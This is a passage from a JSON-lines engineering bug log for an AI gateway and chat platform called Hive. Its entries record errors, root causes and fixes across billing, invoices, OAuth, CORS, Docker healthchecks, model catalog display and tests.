on the pack that ships none of the three skill files.", "root_cause": "Two curation errors in the same direction, both from vetting the rule against engineer-written English. The filename pattern's single-letter C-family extensions (c, h, m) match clock times and initials, and four terms in the corpus (cargo, yarn, lint, maven) are ordinary trade vocabulary in this product's first market: freight, thread, ginned cotton and an expert. Separately the word splitter turned a URL into its component words, so a link's host decided the launch, and the Skill: convention documented on the same field was not read before the evidence tests ran.", "fix": "Drop c, h and m from sourceFilePattern, keeping cc/cpp/cxx/hpp/mm. Remove the four bare build-tool words and add the two-word command forms (cargo build, cargo test, yarn install, yarn build). Short-circuit ^\\\\s*skill: to knowledge-work at the top of InferPack. Strip https?://\\\\S+ before the evidence tests. Trim the pack in Service.CreateTask so the internal surface and the edge agree on a value of \" \". Fixtures for each in infer_test.go and service_test.go, including the reviewer's measured false positives.", "tags": ["cowork", "agent-tasks", "inference", "false-positive", "heuristic", "issue-1623", "pr-1729"]} +{"id": "BUG-1682", "date": "2026-09-02", "title": "Invoice rows and stored PDFs written before the #1648 fix kept a credit count in a paisa column", "error_message": "Workspace invoice displayed about 5,246,533.38 taka for a real spend of about 0.52 USD; total_bdt_subunits held 524653338, which is a Hive credit count, and the console divided it by one hundred to render taka.", "root_cause": "Issue #1648 was fixed in generation only. InsertOrFetch is ON CONFLICT DO NOTHING and the monthly cron is idempotent, so no existing row was ever rewritten, and handlePDF redirects to the stored object rather than re-rendering, so the wrong PDF was served indefinitely. Migration 20260901_01 added usd_bdt_rate deliberately without a backfill, leaving NULL as the discriminator for the conflated rows and no code that acted on it.", "fix": "Added a boot-time repair pass (invoices.Service.RepairUnconvertedInvoices) that selects rows WHERE usd_bdt_rate IS NULL, reads the stored figure as credits, converts once through payments.CreditsToBDTSubunits at the account fx_snapshots rate or the platform rate, regenerates and overwrites the stored PDF, then UPDATEs the row under the same NULL predicate so the pass is idempotent across restarts and replicas. Added total_credits and usd_bdt_rate_source columns (migration 20260902_01) so the ledger quantity is carried rather than inverted, and made the console row and the PDF print Hive credits and the charged taka as two separate figures.", "tags": ["money", "invoices", "billing", "credits", "fx", "idempotency", "migration", "issue-1682", "issue-1681"]} +{"date": "2026-09-02", "title": "A budget window read failure blanked the whole API keys page", "error_message": "One failed per-key read in ListKeyViews returned 500 for the entire list, getApiKeys threw, and ApiKeysPage rendered nothing including the revoke control", "root_cause": "The per-key budget window read added for the usage bar propagated its error out of ListKeyViews, and ApiKeysPage is the only read in its Promise.all with no catch, while the profile and catalogue reads beside it both degrade", "fix": "ListKeyViews logs the failure through slog and leaves budget_spend_credits nil, which the console already renders as a cap with no proportion beside it; a test forces the read to fail and asserts the key is still listed", "tags": ["control-plane", "web-console", "api-keys", "availability", "degradation"], "issue": 1683} +{"date": "2026-08-16", "title": "metered gateway call costs 19 to 23 seconds of Hive-owned overhead per request", "error_message": "none: no error is raised, the request succeeds and is simply 20x slower than the provider call it wraps", "root_cause": "One metered chat completion executes 86 sequential SQL statements against a database in aws-1-us-east-1 whose round-trip latency from the box is 236 to 276 ms, while spending only 216 ms of actual database server time. CreateReservation and FinalizeReservation dominate at 5 to 7 s each because each runs five independent transactions inside its account advisory lock, so every logical operation pays its own BEGIN, statements and COMMIT. Neither settlement placement nor pool exhaustion is the cause; both were measured and excluded.", "fix": "Not fixed here. This change instruments the path so the split is a standing metric (hive_metered_stage_duration_seconds). The cut is collapsing each money call's locked critical section into one transaction, sequenced after the in-flight reservation-release fix to avoid colliding on the same files, plus co-locating the database, which is the only lever that reaches sub-second.", "tags": ["edge-api", "control-plane", "accounting", "latency", "metrics", "demo-box", "round-trips"]} +{"id": "bug-msmbcjgc-8012bd", "timestamp": "2026-08-09T21:27:12.251Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-09T21:27:12.251Z", "error_message": "Open WebUI chat model picker still listed hive-embedding-default, hive-stt and hive-tts after PR #776 merged and deployed (issue #792)", "root_cause": "#776 hid them by writing Open WebUI per-model access_control, but deploy/docker/docker-compose.yml sets BYPASS_MODEL_ACCESS_CONTROL true, which makes main.py skip get_filtered_models for every role in the pinned v0.10.2 image. Even with that flag off, get_filtered_models exempts admins whenever BYPASS_ADMIN_ACCESS_CONTROL is set, and it defaults to true while this deployment promotes every tenant owner to an Open WebUI admin. The mechanism could never fire, and every test shipped with it asserted that values were written rather than read.", "fix": "filter the /api/models response instead, via a build-time patch (deploy/docker/owui-patches/apply_model_picker_patch.py plus hive_model_picker.py). Unconditional, env-driven, applied after upstream own filtering and before the return, leaving request.app.state.MODELS untouched so chat, RAG embeddings and TTS still resolve every alias. Measured on a booted container: removing the bypass instead gives members an empty picker and HTTP 400 Model not found on chat, while leaving RAG and TTS unaffected, so the bypass protects chat and not the named risks. Guard: scripts/test_owui_model_picker_filter.py, with a --live mode that fails when the picker still lists the aliases.", "tags": ["open-webui", "model-picker", "access-control", "inert-fix", "issue-792", "issue-776", "docker-compose"]} +{"date": "2026-08-31", "error_message": "hive-free and hive-free-tools were visibility='public', so any tenant could select and invoke the rate-limited free pool and the no-DPA anonymous-upstream alias from the chat picker", "root_cause": "both aliases were seeded public in their own migrations (20260824_02, 20260830_04) with no consideration of tenant-level entitlement, and no downstream check ever restricted them", "fix": "set visibility='restricted' on both aliases via a new migration; catalog.AliasVisibleToTenant then fails them closed for every tenant with no explicit grant, on both the picker listing and routing.Service.SelectRoute invocation path; CI's own ephemeral tenant seeding (scripts/ci-seed-api-key.sh) now grants itself explicit visibility so the live-integration lane stays green", "tags": ["catalog", "visibility", "free-pool", "rate-limiting", "demo-readiness"]} +{"id": "voice-speech-response-format-1562", "date": "2026-08-30", "title": "Voice failed for every user, and the failure published the gateway's internal address to the browser", "error_message": "External: 500, message='Internal Server Error', url='http://edge-api:8080/v1/audio/speech' (browser toast); GroqException - response_format must be one of [wav] (LiteLLM log)", "root_cause": "Two defects behind one symptom. (1) handleSpeech in apps/edge-api/internal/audio/handler.go rewrote model and voice but forwarded response_format untouched, so the OpenAI SDK's omission let the upstream fall back to its mp3 default, which the Groq Orpheus route refuses; LiteLLM relayed that 400 as a 500. (2) Open WebUI's audio router stringified the aiohttp exception into the client-facing HTTP detail, and aiohttp bakes the request URL into that string, so every voice failure published the compose-internal address to the signed-in user. The reported diagnosis, that the browser calls edge-api:8080, was wrong: the browser is same-origin throughout and was only shown the address.", "fix": "Resolve response_format against what the route can produce (absent becomes wav, explicitly unsupported becomes a 400 naming the parameter, before any reservation). Scrub absolute URLs and bare host:port out of every client-facing audio error via deploy/docker/owui-patches/apply_audio_error_leak_patch.py, since the chat image takes its backend from the pinned upstream image and a vendor/ edit would be inert. Guards: browser-origin-hosts.test.ts, speech_response_format_test.go, test_owui_audio_error_leak.py.", "tags": ["voice", "tts", "audio", "edge-api", "open-webui", "owui-patches", "information-disclosure", "provider-blind", "litellm", "groq", "issue-1562", "issue-1381"]} +{"date": "2026-08-30", "title": "Agent workspace coverage job could not mint a session: admin API is refused at the public origin by design", "error_message": "error: GET /admin/users -> 404 (provisioning) and live-auth: generate_link for ... (HTTP 404) (every authenticated control)", "root_cause": "The job ran on ubuntu-latest, so the only Supabase origin it could reach was the public console origin. Caddyfile.supabase refuses the whole /auth/v1/admin/* prefix there deliberately (a leaked service-role key must not be usable from the internet) and does not publish /rest/v1 there at all. seed-demo-owner.py needs both prefixes and live-auth.mjs needs /auth/v1/admin/generate_link, so neither provisioning nor the mint could work from a GitHub-hosted runner. The provisioning step's continue-on-error masked the first half, so the failure surfaced as six assertion failures rather than as a positioning problem.", "fix": "Moved the job to the demo box's self-hosted runner and ran its two network-dependent steps in containers attached to the stack compose network, where the internal listener serves both prefixes. Added SUPABASE_ADMIN_URL, used by live-auth.mjs for the mint alone and defaulting to SUPABASE_URL, so the cookie envelope stays keyed on the public origin the browser uses. No public route was opened. Verified by two dispatched runs (33305316602, 33305872219): provisioning succeeds and the ledger reports 7/9, up from 3/9.", "tags": ["ci", "auth", "supabase", "caddy", "playwright", "self-hosted-runner", "issue-1531"]} +{"error_message": "cache_control silently dropped on /v1/messages, zero prompt caching for agent clients", "root_cause": "translate_request.go rebuilds the Anthropic request field-by-field into OAIRequest; cache_control (content block, system block, tool, request root) was never one of the carried fields, and two collapse sites in convertMessage flattened a typed content-block array to a plain string, which cannot carry a per-block cache_control even once the field exists", "fix": "added CacheControl to ContentBlock/Tool/MessagesRequest/SystemField and their OAI-shaped mirrors; guarded both flattening sites in translate_request.go to keep block-array form when a cache breakpoint is present; added the exclusive-shape cache_creation_input_tokens/cache_read_input_tokens echo to ResponseUsage and StreamUsage via freshInputTokens' inclusive-to-exclusive subtraction", "tags": ["anthropic", "cache_control", "prompt-caching", "translate_request", "billing-coordination"]} +{"id": "selfhost-enterprise-profile-unbootable", "date": "2026-08-18", "error_message": "enterprise profile could not boot or authenticate: empty JWKS, unpassable PostgREST healthcheck, IPv6 storage probe, missing storage grants", "root_cause": "the enterprise compose had never been run end to end; GoTrue was configured with a symmetric secret only, whose key JWKS excludes, so edge-api's jwt.WithKeySet validator had no key; separately the postgrest image has no shell so its CMD-SHELL healthcheck could never pass and storage waited on it, the storage healthcheck resolved localhost to IPv6 while the server binds IPv4, and storage tables are created after the init script so no GRANT covered them, which the Storage API misreports as an RLS violation because it maps all of SQLSTATE 42501 to that message", "fix": "GOTRUE_JWT_KEYS with an EC P-256 key plus a generator script, a caddy-supabase TLS gateway with prefix stripping and SUPABASE_JWKS_CA_FILE on edge-api, GoTrue pinned to v2.189.0, PostgREST healthcheck removed with dependents on service_started, storage healthcheck moved to 127.0.0.1, ALTER DEFAULT PRIVILEGES for the storage schema", "tags": ["supabase", "self-hosting", "auth", "jwks", "docker-compose", "healthcheck", "rls"]} +{"id": "1411-openrouter-balance-unobserved", "date": "2026-09-02", "title": "The OpenRouter account every paid route bills against ran down to 1.46 USD with nothing reading the balance", "error_message": "No error was raised at all, which is the defect. GET https://openrouter.ai/api/v1/credits returned total_credits 10 and total_usage 8.540654392, so 1.46 USD remained, and the first signal available to anyone would have been a paid request failing with a 402 in front of a demo audience.", "root_cause": "Nothing in the repository read the provider balance on any schedule. scripts/report-free-pool-health.py probes only free endpoints, whose throughput OpenRouter gates on credits purchased all time rather than on the current balance, so it is unaffected by depletion and cannot see it. The out of credit classifier in .github/workflows/ci.yml is by construction downstream of a job that has already failed. The balance was readable the whole time through a single unauthenticated-to-us GET that bills no inference, and no code path read it.", "fix": "Added .github/ci/check-provider-balance.mjs and .github/workflows/provider-balance-watch.yml, a six hourly check that computes days of runway from the larger of the provider's own weekly usage figure and an account wide usage delta carried between runs in the Actions cache, fails on a runway under seven days or a balance under a two dollar backstop floor, fails loudly on any inability to read the number rather than reporting healthy, and files a deduplicated priority:critical GitHub issue that it closes itself on recovery. Regression guard .github/ci/check-provider-balance.test.mjs is wired into the required lint job and asserts the wiring as well as the arithmetic.", "tags": ["monitoring", "money-path", "openrouter", "silent-absence", "github-actions", "demo-surface"]} +{"date": "2026-08-23", "error_message": "docker exec into the recreated open-webui container showed Open WebUI in /app/build/index.html even though vendor/open-webui/src/app.html on the checked-out branch already read Hive Chat, and `docker compose build` had just reported every layer cached and the build successful", "root_cause": "deploy/docker/docker-compose.yml pins the open-webui service to a single fixed image tag (hive-open-webui:v0.10.2-branded) with no per-worktree or per-build namespacing; a concurrent agent's own `docker compose build` on the same shared Docker host retagged that name to point at their (older) build output after this agent's build had already completed, so `docker compose up` picked up someone else's image under the expected name", "fix": "verification-only workaround: override the open-webui service's `image:` to a private, unshared tag (e.g. hive-open-webui:brand1071-verify) before building and running, so no other concurrent agent can repoint it; no repo change made, since the real fix (namespacing the tag, e.g. by branch or worktree) is infrastructure work out of scope for a text-only branding PR", "tags": ["docker", "shared-image-tag", "race-condition", "local-verification", "open-webui"]} +{"id": "bug-2026-09-01-console-notfound-renders-blank-body", "date": "2026-09-01", "title": "A notFound() raised mid-render answers 404 with an empty document body, so the console 404 was a blank white page", "error_message": "GET /console/catalog/nope-qa returned 404 whose body was plus , while an unmatched URL returned a full styled 15 KB body", "root_cause": "Next 16.3.x answers an HTTP access fallback error raised part-way through a server render by seeding a bare error document and leaving the not-found content to the client Flight payload. Boundary depth does not select that path: a segment-scoped not-found.tsx, an app/global-not-found.tsx with experimental.globalNotFound, next 16.3.4 and a synchronous root layout were each built and measured, and none changed the shape.", "fix": "The two pages whose 404 is a data miss render components/app-shell/console-not-found.tsx in place instead of raising notFound(). The three role-gated pages keep notFound(), because the 404 status is the access control there (#947/#948/#949) and a 200 would confirm the surface exists.", "tags": ["web-console", "nextjs", "404", "ssr", "access-control"], "files": ["apps/web-console/app/console/catalog/[id]/page.tsx", "apps/web-console/app/console/api-keys/[id]/limits/page.tsx", "apps/web-console/components/app-shell/console-not-found.tsx"], "related_issues": [1652, 947, 948, 949, 493, 1408]} +{"id": "bug-2026-09-01-catalog-try-in-chat-on-non-chat-models", "date": "2026-09-01", "title": "The console catalog offered Try in chat on embedding, speech-to-text and text-to-speech aliases, and showed customers the internal Hidden lifecycle", "error_message": "/console/catalog rendered a chat deep link on hive-embedding-default, hive-stt and hive-tts, none of which can serve a chat completion, and rendered a Hidden status badge on hive-fast", "root_cause": "The try column was unconditional, with no read of row.capability_badges, and the status column rendered the raw lifecycle value, whose hidden case is this catalog deprecation marker rather than anything a customer can act on.", "fix": "isChatCapable gates the link on the chat badge the row declares, in both the table and the model detail page, and the hidden lifecycle renders as Deprecated.", "tags": ["web-console", "catalog", "ux", "information-disclosure"], "files": ["apps/web-console/components/catalog/model-catalog-table.tsx", "apps/web-console/app/console/catalog/[id]/page.tsx", "apps/web-console/lib/chat-link.ts"], "related_issues": [1647]} +{"id": "bug-2026-09-01-invoice-pdf-proxy-collapses-every-status-to-500", "date": "2026-09-01", "title": "The invoice PDF proxy answered 500 for an unknown invoice id and echoed the upstream error text to the customer", "error_message": "GET /api/invoices/00000000-0000-0000-0000-000000000001/pdf with a valid session answered 500, while the control plane correctly answered 404", "root_cause": "getInvoicePdfUrl threw a generic Error for every non-redirect response including the upstream 404, so the route never reached its own 404 branch, and the route catch-all returned the thrown message with a hardcoded 500.", "fix": "getInvoicePdfUrl returns null on 404 and throws ControlPlaneError with the upstream status otherwise; the route forwards the status class and answers in this app own words, logging and dropping the upstream text per the provider-blind rule. The invoice id is URL-encoded on the way upstream.", "tags": ["web-console", "invoices", "error-handling", "provider-blind"], "files": ["apps/web-console/app/api/invoices/[id]/pdf/route.ts", "apps/web-console/lib/control-plane/client.ts"], "related_issues": [1649]} +{"id": "bug-2026-08-22-oauth-scope-offline-access", "date": "2026-08-22", "severity": "critical", "area": "auth/oauth", "error_message": "error=invalid_request&error_description=unsupported scope: offline_access on every https://chat-hive.scubed.co/oauth/oidc/login attempt; no consent screen, no authorization code, no session", "root_cause": "PR #787 added offline_access to OAUTH_SCOPES in deploy/docker/docker-compose.yml, validated against hosted Supabase whose discovery document advertised that scope. The self-hosted GoTrue v2.189.0 the stack cut over to lists only openid, profile, email, phone in SupportedOAuthScopes and rejects an unknown scope outright instead of ignoring it. Nothing in the repository compared the configured scopes against the authorization server's advertised capability, so every check stayed green while sign-in was dead. The scope was also unnecessary: handleAuthorizationCodeGrant calls IssueRefreshToken unconditionally, so a refresh token is issued without it, confirmed live by a full authorization code flow.", "fix": "Set OAUTH_SCOPES to \"openid email profile\" (partial revert of #787, keeping its client-auth-dialect patch). Added scripts/check-oauth-scopes.py, which reads the live scopes_supported and fails when a configured scope is not advertised, and also when the server advertises offline_access while the config omits it. Wired into a pull-request gate (.github/workflows/oauth-scope-gate.yml), a post-deploy step in deploy-demo-box.yml that also asserts the two call sites resolve the same auth origin, and make test-scripts. Replaced the offline_access assertion in owui_oauth_scope_test.go with an openid-plus-email guard and a wiring guard for the gate.", "tags": ["oauth", "gotrue", "self-hosted-supabase", "open-webui", "sign-in", "capability-mismatch", "p0", "787"], "pr": "#1003"} +{"id": "bug-2026-08-22-authz-build-request-clears-degraded", "date": "2026-08-22", "title": "a malformed CONTROL_PLANE_BASE_URL cleared edge-api's degraded flag on every request and 401'd every valid key", "error_message": "authz: build request: net/url: invalid control character in URL; the caller receives 401 Incorrect API key provided while /health keeps reporting 200", "root_cause": "authz.Client.Resolve registers its deferred health-tracking store before http.NewRequestWithContext, and that store clears resolveDegraded for any error that is not ErrUpstreamUnavailable. The construction error was wrapped as a plain authz: build request, and on this path construction fails only for a malformed URL, which means a bad CONTROL_PLANE_BASE_URL and therefore a failure on every single call. So the flag was cleared on every call while no request could succeed. authorizer.go separately answers an unclassified resolve error with a permanent 401, so the same misconfiguration told every integrator their valid key was wrong.", "fix": "Classify the construction failure as ErrUpstreamUnavailable, since a request that was never constructed never reached a control-plane verdict. That repairs the health signal and the caller-facing error class in one change, and is a smaller diff than reordering the defer while leaving the 401 in place. Guard: TestDegraded_RequestConstructionFailureDoesNotClearDegraded asserts the wrap and Degraded() together, and reverting the classification fails it.", "tags": ["edge-api", "authz", "health-check", "silent-failure", "error-classification", "pr-975"]} +{"id": "bug-2026-08-22-rebase-silently-disarmed-a-health-test", "date": "2026-08-22", "title": "a health regression guard kept passing while testing nothing after an unrelated PR merged", "error_message": "TestNewRouterHealthReactsToRuntimeChange asserted 200 on a router with no ProvisioningReady, and after #993 that path answers 503 for an unrelated reason", "root_cause": "#993 made a nil ProvisioningReady degrade /health deliberately. PR #975's own regression guard built RouterConfig with only DBReady set, so after the rebase both of its 200 assertions were answered by the provisioning branch and the test stopped exercising DBReady at all. It failed loudly only because the rebase also changed DBReady's type; a change that had kept the type would have left it green and hollow. Mutation testing then found a second instance of the same shape: deleting the runtime term from the cmd/server wiring, leaving DBReady: func() bool { return pool != nil }, left the entire control-plane suite green.", "fix": "Give the test a ready ProvisioningReady reporter so the two signals are moved one at a time from opposite sides, and extract dbReadyFunc out of the RouterConfig literal with TestDBReadyFuncCombinesBootAndRuntimeSignals covering no pool, pool plus fresh tracker, runtime degradation and recovery on one callback with no restart, and a nil tracker. Re-running the mutation now fails.", "tags": ["control-plane", "health-check", "test-quality", "mutation-testing", "rebase", "pr-975", "issue-993"]} +{"id": "bug-owui-name-is-email", "timestamp": "2026-08-17T00:00:00.000Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-17T00:00:00.000Z", "title": "Open WebUI stored every user's email address as their display name", "error_message": "Five of six accounts on the demo box have public user.name equal to their email string, so the chat greeting and every avatar initial render an email address", "root_cause": "open_webui/utils/oauth.py handle_callback provisioned a new OAuth user with name = user_data.get(OAUTH_USERNAME_CLAIM) and fell back to name = email when the claim was missing. The claim is always missing on this deployment: Supabase's OAuth authorization server issues a minimal third party OIDC token with standard claims only and no user metadata, the same finding that defeated OAUTH_ROLES_CLAIM, and apps/web-console never collects a name at sign up so there is nothing for the provider to send.", "fix": "Derive the display name from the email local part in open_webui/utils/hive_display_name.py (stdlib only, self checked by scripts/test_owui_display_name.py in make test-scripts) and call it from the provisioning fallback. The configured claim is still preferred when present, and a name the user sets in Settings then Account survives later sign ins because the refresh path only overwrites from a claim that is actually there. Existing accounts are deliberately not rewritten.", "tags": ["open-webui", "oidc", "supabase-oauth", "provisioning", "display-name", "pr-owui-signin"]} +{"id": "owui-display-name-fallback-skipped-sanitize", "date": "2026-08-22", "error_message": "A local part made only of characters the sanitizer drops produced a display name containing a bidirectional override, for example U+202E followed by @example.com", "root_cause": "The empty-words fallback in display_name_from_email returned the email argument verbatim, which was the one path that bypassed _sanitize entirely", "fix": "The fallback sanitizes the address too and returns a neutral literal when nothing alphanumeric survives; regression cases cover both arms", "tags": ["owui", "display-name", "unicode", "bidi", "sanitization"]} +{"id": "owui-signin-localstorage-throw-blanks-page", "date": "2026-08-22", "error_message": "With browser storage blocked, the sign in page rendered neither the page nor the manual provider button", "root_cause": "hasExistingSession read localStorage.token unguarded, and it ran before loaded = true, so the throw left the page in its pre-render state", "fix": "The cookie check is hoisted above a try/catch around the storage read, so a throw degrades to the cookie answer instead of blanking the page", "tags": ["owui", "auth", "localstorage", "availability"]} +{"id": "owui-frontend-test-runner-needed-host-node", "date": "2026-08-22", "error_message": "make test-owui-frontend required host-installed node and npm, contrary to the repository's Docker-only testing contract", "root_cause": "The script called npx vitest directly on the host", "fix": "Runs vitest in a pinned node image with the scratch directory as the only mount and the caller's uid; docker run rather than exec docker run, so the EXIT trap still fires and the scratch directory is not leaked", "tags": ["ci", "docker", "tests", "tooling"]} +{"date": "2026-08-16", "tags": ["owui", "chat", "cowork", "test-litter", "demo-account", "ci"], "error_message": "Demo account (demo@hive-demo.invalid) accumulates permanent chat, agent-task and API-key rows from live coverage suites; user menu also offered a dead Admin Panel entry (404 on every path)", "root_cause": "Two live-coverage code paths silently defaulted their sign-in identity to the shared demo account: agent-workspace-flows.spec.ts's AGENT_EMAIL fallback and chat-coverage.yml's HIVE_QA_AGENT_EMAIL-to-HIVE_QA_TESTER_EMAIL secret fallback (which resolved to the demo identity in practice, per its own coverage ledger). Separately, hive_ui_surfaces.py deliberately kept the OWUI Admin Panel user-menu entry alive via a GUARDS assertion, while Caddyfile.owui already 404s every path it points at (D-014: web-console/control-plane is the sole admin surface).", "fix": "Removed the Admin Panel entry from hive_ui_surfaces.py (moved from GUARDS to REWRITES, same !1 gate as the neighboring Playground entry). Changed both silent demo-account fallbacks to hard failures (agent-workspace-flows.spec.ts's requireMintEnv, chat-coverage.yml's HIVE_QA_AGENT_EMAIL secret) so a live coverage run can no longer land on the demo account by omission. Existing litter enumerated for owner review, not deleted; a dedicated non-demo QA identity still needs to be provisioned and wired to HIVE_QA_AGENT_EMAIL as a follow-up."} +{"id": "BUG-2026-08-30-01", "date": "2026-08-30", "title": "Free pool's OpenRouter member pinned to one free model", "error_message": "route-free-pool-free pinned to openrouter/dots-studio/dots-3-note-preview:free", "root_cause": "The pool's OpenRouter member named a single free model, but OpenRouter adds and removes free models constantly, so the pinned model gets rate limited or retired and the slot dies silently: the deployment answers 404 or 429, the edge retry ladder fails the request over to another member, and a four-key pool is quietly down to three with no alert.", "fix": "Repointed route-free-pool-free to openrouter/free, OpenRouter's own Free Models Router, verified live at zero prompt and completion pricing and independently re-verified by a reviewer. Raised its reasoning_reserve_tokens from 0 to 4096, since the 0 was justified by the pinned model not reasoning; this is housekeeping, as SelectRoute takes the pool max and the siblings already carried 4096. Rewrote the billing-inertness tests to fold the migration corpus and declare preconditions, after review showed the first version passed unchanged with the migration reverted.", "tags": ["free-pool", "openrouter", "money-path", "routing", "test-honesty"], "related": ["#689", "#1171", "#1411", "D-032", "D-048", "D-059"]} +{"id": "bug-1538-zero-content-upstream-actual", "date": "2026-08-30", "title": "Reasoning burns still billed on the upstream_actual arm of session chat and RAG chat", "error_message": "A completed chat turn that returned only hidden reasoning tokens and no assistant-visible text settled at the cost the upstream reported on Open WebUI session chat and on both halves of /v1/rag/chat whenever the resolved alias had no catalog price (hive-auto), while the identical turn on a catalog-priced alias was released free.", "root_cause": "Both surfaces branch on the pricing mode before settling, and the zero-content guard added for #1526 lived inside inference.ChatSettlementCredits, which is only the catalog-priced arm. The other arm returns from inference.UpstreamActualSettlement, whose Delivered verdict is true on any successful cost read and which has no delivery evidence to consult.", "fix": "Extracted the guard into inference.ApplyZeroContentGuard, which ChatSettlementCredits now calls, and applied it at both call sites after the pricing branch, to whichever outcome that branch reached, mirroring settleStream on the API-key path. Extended hive_chat_zero_content_absorbed_credits_total to the variable-price population rather than adding a second counter, and kept the RAG settlement log line firing for an absorbed burn so the generation id still attributes it to a pool member.", "tags": ["billing", "edge-api", "zero-content", "rag", "session-chat", "upstream-actual", "issue-1538"]} +{"id": "console-null-price-sort-sentinel", "date": "2026-08-25", "area": "web-console", "error_message": "Catalog sort by input price high to low placed models with no published price first, ahead of every priced model", "root_cause": "Unknown prices were mapped to a sentinel of Number.POSITIVE_INFINITY and then compared numerically. The sentinel survives the ascending comparator, which puts it last, but the descending comparator is the ascending one negated, which flips the sentinel to the front. A model whose price the console does not know was therefore presented as the most expensive model available.", "fix": "Replaced the sentinel with an explicit partition in comparePrice (apps/web-console/components/catalog/model-catalog-browser.tsx): a null price returns 1 and a null on the other side returns -1 before any numeric comparison runs, so unpriced aliases sort last in both directions. Regression test 'keeps the unpriced alias last in the descending sort too'.", "tags": ["web-console", "catalog", "sorting", "null-handling", "pricing-display"]} +{"id": "bug-1526-zero-content-chat-rag", "date": "2026-08-30", "title": "Reasoning burns billed on the session chat and both RAG chat surfaces", "error_message": "A completed chat turn that returned only hidden reasoning tokens and no assistant-visible text settled at full catalog price on Open WebUI session chat and on both halves of /v1/rag/chat, while the same turn on the API-key streaming path was released free.", "root_cause": "The zero-content guard from PR #1499 lived only in settleStream. The other three surfaces settle through inference.ChatSettlementCredits, whose delivered verdict is true whenever the upstream reported any tokens at all, and no surface-level delivery evidence was ever passed to it.", "fix": "Moved the predicate behind a DeliveryShape value that every surface can build, applied it once inside ChatSettlementCredits, and taught the three callers to release under reason zero_content. Added hive_chat_zero_content_absorbed_credits_total{surface} with all three series created at registration, plus a per-surface test whose only job is to prove the counter can fire on that path.", "tags": ["billing", "edge-api", "zero-content", "rag", "session-chat", "issue-1526"]} +{"id": "2026-08-20-caddy-supabase-healthcheck-pids-leak", "date": "2026-08-20", "title": "caddy-supabase healthcheck never passed: the container's pids cgroup was full, so docker exec could not fork", "error_message": "OCI runtime exec failed: exec failed: unable to start container process: procReady not received", "root_cause": "Every healthcheck exec leaked one pid charge in the container's cgroup. The probe was CMD-SHELL wrapping a busybox wget that forks ssl_client for the TLS leg, three processes per probe every five seconds; after about nineteen hours pids.current reached the 12376 ceiling with only one live process in the cgroup, and from then on the kernel refused to fork the probe at all. The command itself was fine and exits 0 in a fresh container, so reading it proved nothing.", "fix": "Recreated the container to clear the stale charges, and changed the healthcheck to CMD with plain http against the in-network listener: one process per probe instead of three, interval 5s to 15s. https was verifying nothing anyway (--no-check-certificate).", "tags": ["docker", "healthcheck", "cgroups", "caddy", "supabase", "self-host"]} +{"id": "2026-08-20-gotrue-cors-apikey-refused", "date": "2026-08-20", "title": "Self-hosted GoTrue refuses the browser preflight supabase-js sends, because apikey is not on its allow-list", "error_message": "Failed to fetch (browser blocks the request before it is sent; GoTrue answers OPTIONS 204 with no Access-Control-* headers)", "root_cause": "GoTrue's CORS allow-list is a fixed set that does not include apikey, and supabase-js sends apikey on every request. Hosted Supabase hides this because Kong terminates CORS at the edge; the enterprise Caddy gateway proxied the preflight straight through instead.", "fix": "Added a preflight-only handle to Caddyfile.supabase that answers OPTIONS on /auth/v1/* with 204 and echoes Access-Control-Request-Headers back, imported by both the public and internal snippets, after the @admin refusal. Headers stay inside the handle so the proxied response is not given a second Access-Control-Allow-Origin.", "tags": ["cors", "gotrue", "caddy", "supabase", "self-host", "browser"]} +{"id": "bug-2026-08-29-fixture-grant-rescale", "date": "2026-08-29", "title": "e2e fixture credit grant never restated after the D-046 credit unit rescale", "error_message": "Your available credit does not cover this request. Add credits, or send a shorter request, and try again.", "root_cause": "FIXTURE_GRANT_CREDITS in apps/web-console/tests/e2e/support/e2e-fixture-seed.mjs was a bare literal 1_000_000, written to mean 10.00 USD under the legacy unit of 1 USD = 100,000 credits. Migration 20260823_40_credit_unit_rescale_billion.sql (D-046) moved the unit to 1 USD = 1e9 credits and multiplied every stored credits column by 10,000, rescaling database rows but not source constants. The grant silently became 0.001 USD, one hundredth of the flat 100,000,000 credit (0.10 USD) DefaultHoldText hold that /v1/chat/completions takes before dispatch, so enforcePolicy refused every fixture account seeded after the migration, on every alias including the free pool one, before any reservation row was written. A second defect compounded it: the grant's idempotency key carried no amount, so re-seeding a stranded account matched the stale row and skipped the correction permanently.", "fix": "Restated FIXTURE_GRANT_CREDITS as 10_000_000_000 (the same 10.00 USD), put the amount into the grant's idempotency key so a corrected amount tops up instead of being skipped, and added apps/control-plane/internal/accounting/fixture_grant_guard_test.go, which reads the grant and DefaultHoldText from their own source files and drives the real enforcePolicy in both the admit and refuse directions so neither number can move again without the guard going red.", "tags": ["billing", "credits", "d-046", "credit-unit-rescale", "e2e-fixture", "quota", "cross-language-constant-drift", "idempotency"], "issue": 1441} +{"date": "2026-08-29", "error_message": "POST /api/v1/skills/create from a second tenant fails with \"Uh-oh! This id is already registered\" when reusing a display name already used by an unrelated tenant on this shared Open WebUI instance", "root_cause": "skill.id (PK, slugified from name) and skill.name were both unique instance-wide (vendor/open-webui/backend/open_webui/models/skills.py), and skills.py never joined the #1186 sweep that flag-gated the bare admin-role bypass on 11 sibling routers", "fix": "Alembic migration drops the single-column unique and adds a composite (tenant_group_id, name) unique index; router patch resolves a three-case id scope (tenant group, else the caller's own user id, else none for admin) and prefixes the create-time id; apply_router_authz_family_patch.py gains skills.py's five #1186 sites", "tags": ["security", "multi-tenant", "owui", "skills", "sqlite-migration"]} +{"date": "2026-09-02", "issue": 1694, "title": "Credit balances rendered as currency, and one surface printed the credit peg outright", "error_message": "apps/web-console/components/billing/credit-balance.tsx rendered '1,000,000,000 credits per $1.00' beneath every balance, and thirteen balance, usage and spend surfaces across the console and the chat front end rendered credit quantities through USD formatters", "root_cause": "Issue #1332 settled the console on one denomination and chose US dollars, which was a legible choice while the credit unit was the only thing being fixed. It became a disclosure once credits gained a purchase markup (D-065) and a subscription allowance (#1684): a customer who paid a known price for a known credit grant could read the internal value off any balance, and the model detail page printed the dollar figure and the credit integer for the same rate side by side, which is a conversion table.", "fix": "Deleted formatUsdBalanceFromCredits, SUB_CENT_BALANCE and formatUsdFromCredits from the console and both currency formatters from the chat front end, replacing all of them with formatCreditAmount, which renders the exact integer and its unit. Moved the API key budget cap input from dollars to credits. Left invoices and the purchase flow in currency. Guard: every balance surface asserts no currency mark in its rendered output, the API keys budget bar across all five of its states, and the cross-build parity linter compares formatCreditAmount and holds each copy against the policy. A second lint, 